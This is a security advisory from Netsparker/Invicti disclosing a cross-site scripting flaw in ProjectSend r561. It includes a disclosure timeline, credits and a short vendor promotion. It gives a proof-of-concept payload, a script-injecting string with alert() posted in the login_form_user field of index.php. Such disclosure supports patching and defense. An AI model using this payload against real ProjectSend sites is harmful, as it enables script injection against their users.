XSS Vulnerability in ProjectSend
Advisory by Netsparker (now Invicti)
Name: XSS Vulnerability in ProjectSend
Affected Software: ProjectSend
Affected Versions: r561 and possibly below
Vendor Homepage: http://www.projectsend.org/
Vulnerability Type: Cross-site Scripting
Invicti Advisory Reference: NS-14-037
ProjectSend is a self-hosted application (you can install it easily on your own VPS or shared web hosting account) that lets you upload files and assign them to specific clients that you create yourself! Secure, private and easy. No more depending on external services or e-mail to send those files!
Proof of Concept URLs for XSS in ProjectSend:
http://example.com/cftp/index.php - (POST, fields:login_form_user) '"--></style></scRipt><scRipt>alert(0x000078)</scRipt>
For more information on cross-site scripting vulnerabilities, see Cross-site Scripting (XSS).
26/06/2014 – First contact
30/06/2014 – Second contact
03/12/2014 – Advisory released
Credits & Authors
These issues have been discovered by Omar Kurt while testing Invicti Web Application Security Scanner.
Invicti can find and report security issues and vulnerabilities such as SQL Injection and Cross-site Scripting (XSS) in all websites and web applications regardless of the platform and the technology they are built on.